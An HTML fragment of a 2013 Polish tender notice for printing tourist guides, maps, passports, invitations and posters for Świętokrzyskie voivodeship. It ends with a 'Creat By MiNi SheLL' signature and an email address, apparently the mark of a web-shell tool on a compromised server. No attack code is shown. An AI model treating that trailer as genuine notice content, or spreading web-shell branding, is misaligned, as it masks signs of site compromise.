<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa opracowania merytorycznego, graficznego, składu, korekty, naświetlania i druku wydawnictw promujących walory turystyczne województwa świętokrzyskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa opracowania merytorycznego, graficznego, składu, korekty, naświetlania i druku wydawnictw promujących walory turystyczne województwa świętokrzyskiego wraz z ich dostarczeniem do siedziby Zamawiającego w Kielcach przy ul. Paderewskiego 34 A, 25 - 502 Kielce, oraz rozładunkiem przez Wykonawcę w miejscach wskazanych przez Zamawiającego, wg wyszczególnienia: A.	Informator agroturystyczny województwa świętokrzyskiego - w nakładzie 3 000 egzemplarzy;
B.	Perły ziemi świętokrzyskiej - przewodnik mini w wersji polsko-angielsko-niemiecko-francuskiej - w nakładzie 3 000 egzemplarzy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.81.00.00-5, 79.82.20.00-2, 79.82.30.00-9, 79.96.00.00-1, 79.82.11.00-6, 79.97.12.00-3, 79.92.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa opracowania merytorycznego, graficznego, składu, korekty, naświetlania i druku wydawnictw promujących walory turystyczne województwa świętokrzyskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa opracowania merytorycznego, graficznego, składu, korekty, naświetlania i druku wydawnictw promujących walory turystyczne województwa świętokrzyskiego wraz z ich dostarczeniem do siedziby Zamawiającego w Kielcach przy ul. Paderewskiego 34 A, 25 - 502 Kielce, oraz rozładunkiem przez Wykonawcę w miejscach wskazanych przez Zamawiającego, wg wyszczególnienia: Mapa Szlaku Frontu Wschodniego I Wojny Światowej (wersja polsko-angielsko-niemiecka) - w nakładzie 2 000 egzemplarzy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.81.00.00-5, 79.82.20.00-2, 79.82.30.00-9, 79.96.00.00-1, 79.82.11.00-6, 79.97.12.00-3, 79.92.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Przedmiotem zamówienia jest usługa opracowania merytorycznego, graficznego, składu, korekty, naświetlania i druku wydawnictw promujących walory turystyczne województwa świętokrzyskiego oraz zaproszeń i plakatów na imprezy organizowane przez Samorząd Województwa Świętokrzyskiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa opracowania merytorycznego, graficznego, składu, korekty, naświetlania i druku wydawnictw promujących walory turystyczne województwa świętokrzyskiego oraz zaproszeń i plakatów na imprezy organizowane przez Samorząd Województwa Świętokrzyskiego wraz z ich dostarczeniem do siedziby Zamawiającego w Kielcach przy ul. Paderewskiego 34 A, 25 - 502 Kielce, oraz rozładunkiem przez Wykonawcę w miejscach wskazanych przez Zamawiającego, wg wyszczególnienia: A.	Świętokrzyski paszport turystyczny - w nakładzie 15 000 egzemplarzy;
B.	Zaproszenia:
-	Inauguracja sezonu turystycznego - w nakładzie 300 sztuk;
-	Światowy Dzień Turystyki - Obchody Wojewódzkie - w nakładzie 300 sztuk;
-	Świętokrzyski Jarmark Agroturystyczny - 500 sztuk;
C.	 Plakaty - Świętokrzyski Jarmark Agroturystyczny w nakładzie:
-	Format A2 - 200 sztuk,
-	Format B1 - 100 sztuk..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.25.00-7, 79.81.00.00-5, 79.82.20.00-2, 79.82.30.00-9, 79.96.00.00-1, 79.82.11.00-6, 79.97.12.00-3, 79.92.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.09.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com